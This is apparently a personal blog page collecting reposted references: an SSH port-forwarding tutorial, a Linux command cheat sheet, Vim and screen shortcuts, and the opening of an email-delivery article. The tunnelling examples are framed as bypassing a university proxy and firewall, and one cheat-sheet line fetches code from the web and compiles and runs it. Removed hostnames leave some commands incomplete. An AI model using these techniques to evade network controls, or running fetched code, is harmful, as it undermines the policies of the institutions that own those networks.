I didn’t explain what port forwarding is. I found Wikipedia’s definition more explanatory.

Port forwarding or port mapping is a name given to the combined technique of

  1. translating the address and/or port number of a packet to a new destination

  2. possibly accepting such packet(s) in a packet filter(firewall)

  3. forwarding the packet according to the routing table.

Here the first technique will be used in creating an SSH tunnel. When a client application connects to the local port (local endpoint) of the SSH tunnel and transfer data these data will be forwarded to the remote end by translating the host and port values to that of the remote end of the channel.

So with that let’s see how SSH tunnels can be created using forwarded ports with an examples.

Tunnelling with Local port forwarding

Let’s say that is being blocked using a proxy filter in the University. (For the sake of this example. :). Cannot think any valid reason why yahoo would be blocked). A SSH tunnel can be used to bypass this restriction. Let’s name my machine at the university as ‘work’ and my home machine as ‘home’. ‘home’ needs to have a public IP for this to work. And I am running a SSH server on my home machine. Following diagram illustrates the scenario.

To create the SSH tunnel execute following from ‘work’ machine.

ssh -L home

The ‘L’ switch indicates that a local port forward is need to be created. The switch syntax is as follows.

-L <local-port-to-listen>:<remote-host>:<remote-port>

Now the SSH client at ‘work’ will connect to SSH server running at ‘home’ (usually running at port 22) binding port 9001 of ‘work’ to listen for local requests thus creating a SSH tunnel between ‘home’ and ‘work’. At the ‘home’ end it will create a connection to ‘’ at port 80. So ‘work’ doesn’t need to know how to connect to Only ‘home’ needs to worry about that. The channel between ‘work’ and ‘home’ will be encrypted while the connection between ‘home’ and ‘’ will be unencrypted.

Now it is possible to browse by visiting http://localhost:9001 in the web browser at ‘work’ computer. The ‘home’ computer will act as a gateway which would accept requests from ‘work’ machine and fetch data and tunnelling it back. So the syntax of the full command would be as follows.

ssh -L <local-port-to-listen>:<remote-host>:<remote-port> <gateway>

The image below describes the scenario.

Here the ‘host’ to ‘’ connection is only made when browser makes the request not at the tunnel setup time.

It is also possible to specify a port in the ‘home’ computer itself instead of connecting to an external host. This is useful if I were to set up a VNC session between ‘work’ and ‘home’. Then the command line would be as follows.

ssh -L 5900:localhost:5900 home (Executed from 'work')

So here what does localhost refer to? Is it the ‘work’ since the command line is executed from ‘work’? Turns out that it is not. As explained earlier is relative to the gateway (‘home’ in this case) , not the machine from where the tunnel is initiated. So this will make a connection to port 5900 of the ‘home’ computer where the VNC client would be listening in.

The created tunnel can be used to transfer all kinds of data not limited to web browsing sessions. We can also tunnel SSH sessions from this as well. Let’s assume there is another computer (‘banned’) to which we need to SSH from within University but the SSH access is being blocked. It is possible to tunnel a SSH session to this host using a local port forward. The setup would look like this.

As can be seen now the transferred data between ‘work’ and ‘banned’ are encrypted end to end. For this we need to create a local port forward as follows.

ssh -L 9001:banned:22 home

Now we need to create a SSH session to local port 9001 from where the session will get tunneled to ‘banned’ via ‘home’ computer.

ssh -p 9001 localhost

With that let’s move on to next type of SSH tunnelling method, reverse tunnelling.

Reverse Tunnelling with remote port forwarding

Let’s say it is required to connect to an internal university website from home. The university firewall is blocking all incoming traffic. How can we connect from ‘home’ to internal network so that we can browse the internal site? A VPN setup is a good candidate here. However for this example let’s assume we don’t have this facility. Enter SSH reverse tunnelling..

As in the earlier case we will initiate the tunnel from ‘work’ computer behind the firewall. This is possible since only incoming traffic is blocking and outgoing traffic is allowed. However instead of the earlier case the client will now be at the ‘home’ computer. Instead of -L option we now define -R which specifies

a reverse tunnel need to be created.

ssh -R home (Executed from 'work')

Once executed the SSH client at ‘work’ will connect to SSH server running at home creating a SSH channel. Then the server will bind port 9001 on ‘home’ machine to listen for incoming requests which would subsequently be routed through the created SSH channel between ‘home’ and ‘work’. Now it’s possible to browse the internal site

by visiting http://localhost:9001 in ‘home’ web browser. The ‘work’ will then create a connection to intra-site and relay back the response to ‘home’ via the created SSH channel.

As nice all of these would be still you need to create another tunnel if you need to connect to another site in both cases. Wouldn’t it be nice if it is possible to proxy traffic to any site using the SSH channel created? That’s what dynamic port forwarding is all about.

Dynamic Port Forwarding

Dynamic port forwarding allows to configure one local port for tunnelling data to all remote destinations. However to utilize this the client application connecting to local port should send their traffic using the SOCKS protocol. At the client side of the tunnel a SOCKS proxy would be created and the application (eg. browser) uses the SOCKS protocol to specify where the traffic should be sent when it leaves the other end of the ssh tunnel.

ssh -D 9001 home (Executed from 'work')

Here SSH will create a SOCKS proxy listening in for connections at local port 9001 and upon receiving a request would route the traffic via SSH channel created between ‘work’ and ‘home’. For this it is required to configure the browser to point to the SOCKS proxy at port 9001 at localhost.


Auteur : Harlok

2019-05-10 15:09:49

Linux Commands reference

This is a linux command line reference for common operations. Examples marked with • are valid/safe to paste without modification into a terminal, so you may want to keep a terminal window open while reading this so you can cut & paste.

apropos whatisShow commands pertinent to string. See also threadsafe
man -t ascii | ps2pdf - > ascii.pdfmake a pdf of a manual page
 which commandShow full path name of command
 time commandSee how long a command takes
time catStart stopwatch. Ctrl-d to stop. See also sw
dir navigation
cd -Go to previous directory
cdGo to $HOME directory
 (cd dir && command)Go to dir, execute command and return to current dir
pushd .Put current dir on stack so you can popd back to it
alias l='ls -l --color=auto'quick dir listing.
ls -lrtList files by date. See also newest and find_mm_yyyy
ls /usr/bin | pr -T9 -W$COLUMNSPrint in 9 columns to width of terminal
 find -name '*.[ch]' | xargs grep -E 'expr'Search 'expr' in this dir and below. See also findrepo
 find -type f -print0 | xargs -r0 grep -F 'example'Search all regular files for 'example' in this dir and below
 find -maxdepth 1 -type f | xargs grep -F 'example'Search all regular files for 'example' in this dir
 find -maxdepth 1 -type d | while read dir; do echo $dir; echo cmd2; doneProcess each item with multiple commands (in while loop)
find -type f ! -perm -444Find files not readable by all (useful for web site)
find -type d ! -perm -111Find dirs not accessible by all (useful for web site)
locate -r 'file[^/]*\.txt'Search cached index for names. This re is like glob *file*.txt
look referenceQuickly search (sorted) dictionary for prefix
grep --color reference /usr/share/dict/wordsHighlight occurances of regular expression in dictionary
archives and compression
 gpg -c fileEncrypt file
 gpg file.gpgDecrypt file
 tar -c dir/ | bzip2 > dir.tar.bz2Make compressed archive of dir/
 bzip2 -dc dir.tar.bz2 | tar -xExtract archive (use gzip instead of bzip2 for tar.gz files)
 tar -c dir/ | gzip | gpg -c | ssh user@remote 'dd of=dir.tar.gz.gpg'Make encrypted archive of dir/ on remote machine
 find dir/ -name '*.txt' | tar -c --files-from=- | bzip2 > dir_txt.tar.bz2Make archive of subset of dir/ and below
 find dir/ -name '*.txt' | xargs cp -a --target-directory=dir_txt/ --parentsMake copy of subset of dir/ and below
 ( tar -c /dir/to/copy ) | ( cd /where/to/ && tar -x -p )Copy (with permissions) copy/ dir to /where/to/ dir
 ( cd /dir/to/copy && tar -c . ) | ( cd /where/to/ && tar -x -p )Copy (with permissions) contents of copy/ dir to /where/to/
 ( tar -c /dir/to/copy ) | ssh -C user@remote 'cd /where/to/ && tar -x -p' Copy (with permissions) copy/ dir to remote:/where/to/ dir
 dd bs=1M if=/dev/sda | gzip | ssh user@remote 'dd of=sda.gz'Backup harddisk to remote machine
rsync (Network efficient file copier: Use the --dry-run option for testing)
 rsync -P rsync:// fileOnly get diffs. Do multiple times for troublesome downloads
 rsync --bwlimit=1000 fromfile tofileLocally copy with rate limit. It's like nice for I/O
 rsync -az -e ssh --delete ~/public_html/'~/public_html'Mirror web site (using compression and encryption)
 rsync -auz -e ssh remote:/dir/ . && rsync -auz -e ssh . remote:/dir/Synchronize current directory with remote one
ssh (Secure SHell)
 ssh $USER@$HOST commandRun command on $HOST as $USER (default command=shell)
ssh -f -Y $USER@$HOSTNAME xeyesRun GUI command on $HOSTNAME as $USER
 scp -p -r $USER@$HOST: file dir/Copy with permissions to $USER's home directory on $HOST
 scp -c arcfour $USER@$LANHOST: bigfileUse faster crypto for local LAN. This might saturate GigE
 ssh -g -L 8080:localhost:80 root@$HOSTForward connections to $HOSTNAME:8080 out to $HOST:80
 ssh -R 1434:imap:143 root@$HOSTForward connections from $HOST:1434 in to imap:143
 ssh-copy-id $USER@$HOST Install public key for $USER@$HOST for password-less log in
wget (multi purpose download tool)
(cd dir/ && wget -nd -pHEKk local browsable version of a page to the current dir
 wget -c downloading a partially downloaded file
 wget -r -nd -np -l1 -A '*.jpg' a set of files to the current directory
 wget ftp://remote/file[1-9].iso/FTP supports globbing directly
wget -q -O- | grep 'a href' | headProcess output directly
 echo 'wget url' | at 01:00Download url at 1AM to current dir
 wget --limit-rate=20k urlDo a low priority download (limit to 20KB/s in this case)
 wget -nv --spider --force-html -i bookmarks.htmlCheck links in a file
 wget --mirror update a local copy of a site (handy from cron)
networking (Note ifconfig, route, mii-tool, nslookup commands are obsolete)
 ethtool eth0Show status of ethernet interface eth0
 ethtool --change eth0 autoneg off speed 100 duplex fullManually set ethernet interface speed
 iw dev wlan0 linkShow link status of wireless interface wlan0
 iw dev wlan0 set bitrates legacy-2.4 1Manually set wireless interface speed
iw dev wlan0 scanList wireless networks in range
ip link showList network interfaces
 ip link set dev eth0 name wanRename interface eth0 to wan
 ip link set dev eth0 upBring interface eth0 up (or down)
ip addr showList addresses for interfaces
 ip addr add brd + dev eth0Add (or del) ip and mask (
ip route showList routing table
 ip route add default via default gateway to
ss -tuplList internet services on a system
ss -tupList active connections to/from system
host pixelbeat.orgLookup DNS ip address for name or vice versa
hostname -iLookup local ip address (equivalent to host `hostname`)
whois pixelbeat.orgLookup whois info for hostname or ip address
windows networking (Note samba is the package that provides all this windows specific networking support)
smbtreeFind windows machines. See also findsmb
 nmblookup -A the windows (netbios) name associated with ip address
 smbclient -L windows_boxList shares on windows machine or samba server
 mount -t smbfs -o fmask=666,guest //windows_box/share /mnt/shareMount a windows share
 echo 'message' | smbclient -M windows_boxSend popup to windows machine (off by default in XP sp2)
text manipulation (Note sed uses stdin and stdout. Newer versions support inplace editing with the -i option)
 sed 's/string1/string2/g'Replace string1 with string2
 sed 's/\(.*\)1/\12/g'Modify anystring1 to anystring2
 sed '/^ *#/d; /^ *$/d'Remove comments and blank lines
 sed ':a; /\\$/N; s/\\\n//; ta'Concatenate lines with trailing \
 sed 's/[ \t]*$//'Remove trailing spaces from lines
 sed 's/\([`"$\]\)/\\\1/g'Escape shell metacharacters active within double quotes
seq 10 | sed "s/^/      /; s/ *\(.\{7,\}\)/\1/"Right align numbers
seq 10 | sed p | paste - -Duplicate a column
 sed -n '1000{p;q}'Print 1000th line
 sed -n '10,20p;20q'Print lines 10 to 20
 sed -n 's/.*<title>\(.*\)<\/title>.*/\1/ip;T;q'Extract title from HTML web page
 sed -i 42d ~/.ssh/known_hostsDelete a particular line
 sort -t. -k1,1n -k2,2n -k3,3n -k4,4nSort IPV4 ip addresses
echo 'Test' | tr '[:lower:]' '[:upper:]'Case conversion
tr -dc '[:print:]' < /dev/urandomFilter non printable characters
tr -s '[:blank:]' '\t' </proc/diskstats | cut -f4cut fields separated by blanks
history | wc -lCount lines
seq 10 | paste -s -d ' 'Concatenate and separate line items to a single line
set operations (Note you can export LANG=C for speed. Also these assume no duplicate lines within a file)
 sort -u file1 file2Union of unsorted files
 sort file1 file2 | uniq -dIntersection of unsorted files
 sort file1 file1 file2 | uniq -uDifference of unsorted files
 sort file1 file2 | uniq -uSymmetric Difference of unsorted files
 join -t'\0' -a1 -a2 file1 file2Union of sorted files
 join -t'\0' file1 file2Intersection of sorted files
 join -t'\0' -v2 file1 file2Difference of sorted files
 join -t'\0' -v1 -v2 file1 file2Symmetric Difference of sorted files
echo '(1 + sqrt(5))/2' | bc -lQuick math (Calculate φ). See also bc
seq -f '4/%g' 1 2 99999 | paste -sd-+ | bc -lCalculate π the unix way
echo 'pad=20; min=64; (100*10^6)/((pad+min)*8)' | bcMore complex (int) e.g. This shows max FastE packet rate
echo 'pad=20; min=64; print (100E6)/((pad+min)*8)' | pythonPython handles scientific notation
echo 'pad=20; plot [64:1518] (100*10**6)/((pad+x)*8)' | gnuplot -persistPlot FastE packet rate vs packet size
echo 'obase=16; ibase=10; 64206' | bcBase conversion (decimal to hexadecimal)
echo $((0x2dec))Base conversion (hex to dec) ((shell arithmetic expansion))
units -t '100m/9.58s' 'miles/hour'Unit conversion (metric to imperial)
units -t '500GB' 'GiB'Unit conversion (SI to IEC prefixes). See also numfmt
units -t '1 googol'Definition lookup
seq 100 | paste -s -d+ | bcAdd a column of numbers. See also add and funcpy
cal -3Display a calendar
cal 9 1752Display a calendar for a particular month year
date -d friWhat date is it this friday. See also day
[ $(date -d '12:00 today +1 day' +%d) = '01' ] || exitexit a script unless it's the last day of the month
date --date='25 Dec' +%AWhat day does xmas fall on, this year
date --date='@2147483647'Convert seconds since the epoch (1970-01-01 UTC) to date
TZ='America/Los_Angeles' dateWhat time is it on west coast of US (use tzselect to find TZ)
date --date='TZ="America/Los_Angeles" 09:00 next Fri'What's the local time for 9AM next Friday on west coast US
printf "%'d\n" 1234Print number with thousands grouping appropriate to locale
BLOCK_SIZE=\'1 ls -lUse locale thousands grouping in ls. See also l
echo "I live in `locale territory`"Extract info from locale database
LANG=en_IE.utf8 locale int_prefixLookup locale info for specific country. See also ccodes
locale -kc $(locale | sed -n 's/\(LC_.\{4,\}\)=.*/\1/p') | lessList fields available in locale database
recode (Obsoletes iconv, dos2unix, unix2dos)
recode -l | lessShow available conversions (aliases on each line)
 recode windows-1252.. file_to_change.txtWindows "ansi" to local charset (auto does CRLF conversion)
 recode utf-8/CRLF.. file_to_change.txtWindows utf8 to local charset
 recode iso-8859-15..utf8 file_to_change.txtLatin9 (western europe) to utf8
 recode ../b64 < file.txt > file.b64Base64 encode
 recode /qp.. < file.qp > file.txtQuoted printable decode
 recode ..HTML < file.txt > file.htmlText to HTML
recode -lf windows-1252 | grep euroLookup table of characters
echo -n 0x80 | recode latin-9/x1..dumpShow what a code represents in latin-9 charmap
echo -n 0x20AC | recode ucs-2/x2..latin-9/xShow latin-9 encoding
echo -n 0x20AC | recode ucs-2/x2..utf-8/xShow utf-8 encoding
 gzip < /dev/cdrom > cdrom.iso.gzSave copy of data cdrom
 mkisofs -V LABEL -r dir | gzip > cdrom.iso.gzCreate cdrom image from contents of dir
 mount -o loop cdrom.iso /mnt/dirMount the cdrom image at /mnt/dir (read only)
 wodim dev=/dev/cdrom blank=fastClear a CDRW
 gzip -dc cdrom.iso.gz | wodim -tao dev=/dev/cdrom -v -data -Burn cdrom image (use --prcap to confirm dev)
 cdparanoia -BRip audio tracks from CD to wav files in current dir
 wodim -v dev=/dev/cdrom -audio -pad *.wavMake audio CD from all wavs in current dir (see also cdrdao)
 oggenc --tracknum=$track track.cdda.wav -o track.oggMake ogg file from wav file
disk space
ls -lSrShow files by size, biggest last
du -s * | sort -k1,1rn | headShow top disk users in current dir. See also dutop
du -hs /home/* | sort -k1,1hSort paths by easy to interpret disk usage
df -hShow free space on mounted filesystems
df -iShow free inodes on mounted filesystems
fdisk -lShow disks partitions sizes and types (run as root)
rpm -q -a --qf '%10{SIZE}\t%{NAME}\n' | sort -k1,1nList all packages by installed size (Bytes) on rpm distros
dpkg-query -W -f='${Installed-Size;10}\t${Package}\n' | sort -k1,1nList all packages by installed size (KBytes) on deb distros
dd bs=1 seek=2TB if=/dev/null of=ext3.testCreate a large test file (taking no space). See also truncate
> filetruncate data of file or create an empty file
tail -f /var/log/messagesMonitor messages in a log file
strace -c ls >/dev/nullSummarise/profile system calls made by command
strace -f -e open ls >/dev/nullList system calls made by command
strace -f -e trace=write -e write=1,2 ls >/dev/nullMonitor what's written to stdout and stderr
ltrace -f -e getenv ls >/dev/nullList library calls made by command
lsof -p $$List paths that process id has open
lsof ~List processes that have specified path open
tcpdump not port 22Show network traffic except ssh. See also tcpdump_not_me
ps -e -o pid,args --forestList processes in a hierarchy
ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed '/^ 0.0 /d'List processes by % cpu usage
ps -e -orss=,args= | sort -b -k1,1n | pr -TW$COLUMNSList processes by mem (KB) usage. See also
ps -C firefox-bin -L -o pid,tid,pcpu,stateList all threads for a particular process
ps -p 1,$$ -o etime=List elapsed wall time for particular process IDs
watch -n.1 pstree -Uacp $$Display a changing process subtree
last rebootShow system reboot history
free -mShow amount of (remaining) RAM (-m displays in MB)
watch -n.1 'cat /proc/interrupts'Watch changeable data continuously
udevadm monitorMonitor udev events to help configure rules
system information (see also sysinfo) ('#' means root access is required)
uname -aShow kernel version and system architecture
head -n1 /etc/issueShow name and version of distribution
cat /proc/partitionsShow all partitions registered on the system
grep MemTotal /proc/meminfoShow RAM total seen by the system
grep "model name" /proc/cpuinfoShow CPU(s) info
lspci -tvShow PCI info
lsusb -tvShow USB info
mount | column -tList mounted filesystems on the system (and align output)
grep -F capacity: /proc/acpi/battery/BAT0/infoShow state of cells in laptop battery
#dmidecode -q | lessDisplay SMBIOS/DMI information
#smartctl -A /dev/sda | grep Power_On_HoursHow long has this disk (system) been powered on in total
#hdparm -i /dev/sdaShow info about disk sda
#hdparm -tT /dev/sdaDo a read speed test on disk sda
#badblocks -s /dev/sdaTest for unreadable blocks on disk sda
interactive (see also linux keyboard shortcuts)
readlineLine editor used by bash, python, bc, gnuplot, ...
screenVirtual terminals with detach capability, ...
mcPowerful file manager that can browse rpm, tar, ftp, ssh, ...
gnuplotInteractive/scriptable graphing
linksWeb browser
xdg-open .open a file or url with the registered desktop application
grep . /proc/sys/net/ipv4/*List the contents of flag files
set | grep $USERSearch current environment
tr '\0' '\n' < /proc/$$/environDisplay the startup environment for any process
echo $PATH | tr : '\n'Display the $PATH one per line
kill -0 $$ && echo process exists and can accept signalsCheck for the existence of a process (pid)
find /etc -readable | xargs less -K -p'*ntp' -j $((${LINES:-25}/2))Search paths and data with full context. Use n to iterate
namei -l ~/.sshOutput attributes for all directories leading to a file name
Low impact admin
#apt-get install "package" -o Acquire::http::Dl-Limit=42 \
-o Acquire::Queue-mode=access
Rate limit apt-get to 42KB/s
 echo 'wget url' | at 01:00Download url at 1AM to current dir
#apache2ctl configtest && apache2ctl gracefulRestart apache if config is OK
nice openssl speed sha1Run a low priority command (openssl benchmark)
chrt -i 0 openssl speed sha1Run a low priority command (more effective than nice)
renice 19 -p $$; ionice -c3 -p $$Make shell (script) low priority. Use for non interactive tasks
Interactive monitoring
watch -t -n1 uptimeClock with system load
htop -d 5Better top (scrollable, tree view, lsof/strace integration, ...)
iotopWhat's doing I/O
#watch -d -n30 "nice | tail -n $((${LINES:-12}-2))"What's using RAM
#iftopWhat's using the network. See also iptraf
#mtr www.pixelbeat.orgping and traceroute combined
Useful utilities
pv < /dev/zero > /dev/nullProgress Viewer for data copying from files and pipes
wkhtml2pdf http://.../linux_commands.html linux_commands.pdfMake a pdf of a web page
timeout 1 sleep infrun a command with bounded time. See also timeout
python -m SimpleHTTPServerServe current directory tree at http://$HOSTNAME:8000/
openssl s_client -connect </dev/null 2>&0 |
openssl x509 -dates -noout
Display the date range for a site's certs
curl -I www.pixelbeat.orgDisplay the server headers for a web site
#lsof -i tcp:80What's using port 80
#httpd -SDisplay a list of apache virtual hosts
vim scp://user@remote//path/to/fileEdit remote file using local vim. Good for high latency links
curl -s | gpg --importImport a gpg key from the web
tc qdisc add dev lo root handle 1:0 netem delay 20msecAdd 20ms latency to loopback device (for testing)
tc qdisc del dev lo rootRemove latency added above
echo "DISPLAY=$DISPLAY xmessage cooker" | at "NOW +30min"Popup reminder
notify-send "subject" "message"Display a gnome popup notification
 echo "mail -s 'go home' < /dev/null" | at 17:30Email reminder
 uuencode file name | mail -s subject P@draigBrady.comSend a file via email | mail -a "Content-Type: text/html" P@draigBrady.comSend/Generate HTML email
Better default settings (useful in your .bashrc)
#tail -s.1 -f /var/log/messagesDisplay file additions more responsively
seq 100 | tail -n $((${LINES:-12}-2))Display as many lines as possible without scrolling
#tcpdump -s0Capture full network packets
Useful functions/aliases (useful in your .bashrc)
md () { mkdir -p "$1" && cd "$1"; }Change to a new directory
strerror() { python -c "import os; print os.strerror($1)"; }Display the meaning of an errno
plot() { { echo 'plot "-"' "$@"; cat; } | gnuplot -persist; }Plot stdin. (e.g: • seq 1000 | sed 's/.*/s(&)/' | bc -l | plot)
hili() { e="$1"; shift; grep --col=always -Eih "$e|$" "$@"; }highlight occurences of expr. (e.g: • env | hili $USER)
alias hd='od -Ax -tx1z -v'Hexdump. (usage e.g.: • hd /proc/self/cmdline | less)
alias realpath='readlink -f'Canonicalize path. (usage e.g.: • realpath ~/../$USER)
ord() { printf "0x%x\n" "'$1"; }shell version of the ord() function
chr() { printf $(printf '\\%03o\\n' "$1"); }shell version of the chr() function
DISPLAY=:0.0 import -window root orig.pngTake a (remote) screenshot
convert -filter catrom -resize '600x>' orig.png 600px_wide.pngShrink to width, computer gen images or screenshots
 mplayer -ao pcm -vo null -vc dummy /tmp/Flash*Extract audio from flash video to audiodump.wav
 ffmpeg -i filename.aviDisplay info about multimedia file
ffmpeg -f x11grab -s xga -r 25 -i :0 -sameq demo.mpgCapture video of an X display
 for i in $(seq 9); do ffmpeg -i $i.avi -target pal-dvd $i.mpg; doneConvert video to the correct encoding and aspect for DVD
 dvdauthor -odvd -t -v "pal,4:3,720xfull" *.mpg;dvdauthor -odvd -TBuild DVD file system. Use 16:9 for widescreen input
 growisofs -dvd-compat -Z /dev/dvd -dvd-video dvdBurn DVD file system to disc
python -c "import unicodedata as u; print"Lookup a unicode character
uconv -f utf8 -t utf8 -x nfcNormalize combining characters
printf '\300\200' | iconv -futf8 -tutf8 >/dev/nullValidate UTF-8
printf 'ŨTF8\n' | LANG=C grep --color=always '[^ -~]\+'Highlight non printable ASCII chars in UTF-8
fc-match -s "sans:lang=zh"List font match order for language and style
gcc -march=native -E -v -</dev/null 2>&1|sed -n 's/.*-mar/-mar/p'Show autodetected gcc tuning params. See also gcccpuopt
for i in $(seq 4); do { [ $i = 1 ] && wget -qO-||
./a.out; } | tee /dev/tty | gcc -xc - 2>/dev/null; done
Compile and execute C code from stdin
cpp -dM /dev/nullShow all predefined macros
echo "#include <features.h>" | cpp -dN | grep "#define __USE_"Show all glibc feature macros
 gdb -tuiDebug showing source code context in separate windows
udevadm info -a -p $(udevadm info -q path -n /dev/input/mouse0)List udev attributes of a device, for matching rules etc.
udevadm test /sys/class/input/mouse0See how udev rules are applied for a device
#udevadm control --reload-rulesReload udev rules after modification
Extended Attributes (Note you may need to (re)mount with "acl" or "user_xattr" options)
getfacl .Show ACLs for file
setfacl -m u:nobody:r .Allow a specific user to read file
setfacl -x u:nobody .Delete a specific user's rights to file
 setfacl --default -m group:users:rw- dir/Set umask for a for a specific dir
 getcap fileShow capabilities for a program
 setcap cap_net_raw+ep your_gtk_progAllow gtk program raw access to network
stat -c%C .Show SELinux context for file
 chcon ... fileSet SELinux context for file (see also restorecon)
getfattr -m- -d .Show all extended attributes (includes selinux,acls,...)
setfattr -n "" -v "bar" .Set arbitrary user attributes
BASH specific
echo 123 | tee >(tr 1 a) | tr 1 bSplit data to 2 commands (using process substitution)
 meld local_file <(ssh host cat remote_file)Compare a local and remote file (using process substitution)
taskset -c 0 nprocRestrict a command to certain processors
find -type f -print0 | xargs -r0 -P$(nproc) -n10 md5sumProcess files in parallel over available processors
 sort -m <(sort data1) <(sort data2) >data.sortedSort separate data files over 2 processors
source ©

Auteur : Harlok

2019-05-13 11:24:41

Vim reference

vim file +54open file and go to line 54any : command can be run using + on command line
vim -O file1 file2open file1 and file2 side by side 
Insertenter insert modeso you can start typing. Alternatively one can use i or a.
Escleave insert modeso you can issue commands. Note in VIM the cursor keys & {Home, End, Page{up,down}} and Delete and Backspace work as expected in any mode, so you don't need to go back to command mode nearly as much as the origonal vi. Note even Ctrl+{left,right} jumps words like most other editors. Note also Ctrl+[ and Ctrl+c are equivalent to Esc and may be easier to type. Also Ctrl+o in insert mode will switch to normal mode for one command only and automatically switch back.
:commandruns named command 
:help wordshows help on wordTyping Ctrl+d after word shows all entries containing word
:echo &wordshows value of word 
:eset buffer for current windowyou can optionally specify a new file or existing buffer number (#3 for e.g.). Note if you specify a directory a file browser is started. E.g. :e . will start the browser in the current directory (which can be changed with the :cd command).
:spnew window aboveditto
:vsnew window to leftditto
:qclose current window 
:qaclose all windowsadd trailing ! to force
Ctrl+w {left,right,up,down}move to window 
Ctrl+w Ctrl+wtoggle window focus 
Ctrl+w =autosize windowsto new terminal size for e.g.
:banew window for all buffers":vert ba" tiles windows vertically
:lslist buffers 
gfopen file under cursor 
:bddelete bufferand any associated windows
:wsave fileNote :up[date] only writes file if changes made, but it's more awkward to type
:sav filenamesave file as filenameNote :w filename doesn't switch to new file. Subsequent edits/saves happen to existing file
ggGoto start of file 
GGoto end of file 
:54Goto line 54 
80|Goto column 80 
Ctrl+gShow file infoincluding your position in the file
gaShow character infog8 shows UTF8 encoding
Ctrl+escroll upCtrl+x needed first for insert mode
Ctrl+yscroll downCtrl+x needed first for insert mode
ztscroll current line to top of window 
wGoto next wordNote Ctrl+{right} in newer vims (which work also in insert mode)
bGoto previous wordNote Ctrl+{left} in newer vims
[{Goto previous { of current scope 
%Goto matching #if #else,{},(),[],/* */must be one on line
zitoggle folds on/off 
m {a-z}mark position as {a-z}E.g. m a
' {a-z}move to position {a-z}E.g. ' a
' 'move to previous position 
'0open previous filehandy after starting vim
vselect visuallyuse cursor keys, home, end etc.
Shift+vline selectCTRL+v = column select
Deletecut selection 
"_xdelete selectionwithout updating the clipboard or yank buffer.
I remap x to this in my .vimrc
ycopy selection 
ppaste (after cursor)P is paste before cursor
"Ayappend selected lines to register ause lowercase a to initialise register
"appaste contents of a 
gqreformat selectionjustifies text and is useful with :set textwidth=70 (80 is default)
=reindent selectionvery useful to fix indentation for c code
>indent sectionuseful with Shift+v%
<unindent sectionremember . to repeat and u to undo
:set list!toggle visible whitespaceSee also listchars in my .vimrc
clipboard shortcuts
ddcut current line 
yycopy current line 
Dcut to end of line 
y$copy to end of line 
/regexpsearches forwards for regexp? reverses direction
nrepeat previous searchN reverses direction
*searches forward for word under cursor# reverses direction
:%s/1/2/gcsearch for regexp 1 and
replace with 2 in file
c = confirm change
:s/1/2/gsearch for regexp 1 and
replace with 2 in (visual) selection
Klookup word under cursor in man pages2K means lookup in section 2
:makerun make in current directory 
Ctrl+]jump to tagCtrl+t to jump back levels. I map these to Alt+⇦⇨ in my .vimrc
vim -t nameStart editing where name is defined 
Ctrl+{n,p}scroll forward,back through
autocompletions for
word before cursor
uses words in current file (and included files) by default. You can change to a dictionary for e.g:
set complete=k/usr/share/dicts/words
Note only works in insert mode
Ctrl+x Ctrl+oscroll through
language specific completions for
text before cursor
"Intellisense" for vim (7 & later).
:help compl-omni for more info.
Useful for python, css, javascript, ctags, ...
Note only works in insert mode
external filters
:%!filterput whole file through filter 
:!filterput (visual) selection through filter 
:,!commandreplace current line with command output 
map <f9> :w<CR>:!python %<CR>run current file with external program 
source ©

Auteur : Harlok

2019-05-10 16:57:23

Screen keyboard shortcuts

screen is a much under utilised program, which provides the following functionality:
  • Remote terminal session management (detaching or sharing terminal sessions)
  • unlimited windows (unlike the hardcoded number of Linux virtual consoles)
  • scrollback buffer (not limited to video memory like Linux virtual consoles)
  • copy/paste between windows
  • notification of either activity or inactivity in a window
  • split terminal (horizontally and vertically) into multiple regions
  • locking other users out of terminal
  • See also the tmux alternative
    See also the byobu screen config manager. See also the reptyr as another way to reattach programs to a terminal. Note for nested screen sessions, use "Ctrl+a a" to send commands to the inner screen, and the standard "Ctrl+a" to send commands to the outer screen.
    Ctrl+a cnew window 
    Ctrl+a nnext windowI bind F12 to this
    Ctrl+a pprevious windowI bind F11 to this
    Ctrl+a "select window from listI have window list in the status line
    Ctrl+a Ctrl+aprevious window viewed 
    Ctrl+a Ssplit terminal horizontally into regionsCtrl+a c to create new window there
    Ctrl+a |split terminal vertically into regionsRequires screen >= 4.1
    Ctrl+a :resizeresize region 
    Ctrl+a :fitfit screen size to new terminal sizeCtrl+a F is the same. Do after resizing xterm
    Ctrl+a :removeremove regionCtrl+a X is the same
    Ctrl+a tabMove to next region 
    Ctrl+a ddetach screen from terminalStart screen with -r option to reattach
    Ctrl+a Aset window title 
    Ctrl+a xlock sessionEnter user password to unlock
    Ctrl+a [enter scrollback/copy modeEnter to start and end copy region. Ctrl+a ] to leave this mode
    Ctrl+a ]paste bufferSupports pasting between windows
    Ctrl+a >write paste buffer to fileuseful for copying between screens
    Ctrl+a <read paste buffer from fileuseful for pasting between screens
    Ctrl+a ?show key bindings/command namesNote unbound commands only in man page
    Ctrl+a :goto screen command promptup shows last command entered
    source ©

Auteur : Harlok

2019-05-10 16:45:43

So You'd Like to Send Some Email

Email is the cockroach of communication mediums: you just can't kill it. Email is the one method of online contact that almost everyone -- at least for that subset of "everyone" which includes people who can bear to touch a computer at all -- is guaranteed to have, and use.

So, reluctantly, we come to the issue of sending email through code. It's easy! Let's send some email through oh, I don't know, let's say ... Ruby, courtesy of some sample code I found while browsing the Ruby tag on Stack Overflow.

require 'net/smtp'
def send_email(to, subject = "", body = "")
from = ""
body= "From: #{from}\r\nTo: #{to}\r\nSubject: #{subject}\r\n\r\n#{body}\r\n"
Net::SMTP.start('', 25, '') do |smtp|
smtp.send_message body, from, to
send_email "", "test", "blah blah blah"

There's a bug in this code, though. Do you see it?

Just because you send an email doesn't mean it will arrive. Not by a long shot. Bear in mind this is email we're talking about. It was never designed to survive a bitter onslaught of criminals and spam, not to mention the explosive, exponential growth it has seen over the last twenty years. Email is a well that has been truly and thoroughly poisoned -- the digital equivalent of a superfund cleanup site. The ecosystem around email is a dank miasma of half-implemented, incompletely supported anti-spam hacks and workarounds.

Which means the odds of that random email your code just sent getting to its specific destination is .. spotty. At best.

If you want email your code sends to actually arrive in someone's AOL mailbox, to the dulcet tones of "You've Got Mail!", there are a few things you must do first. And most of them are only peripherally related to writing code.

1. Make sure the computer sending the email has a Reverse PTR record

What's a reverse PTR record? It's something your ISP has to configure for you -- a way of verifying that the email you send from a particular IP address actually belongs to the domain it is purportedly from.

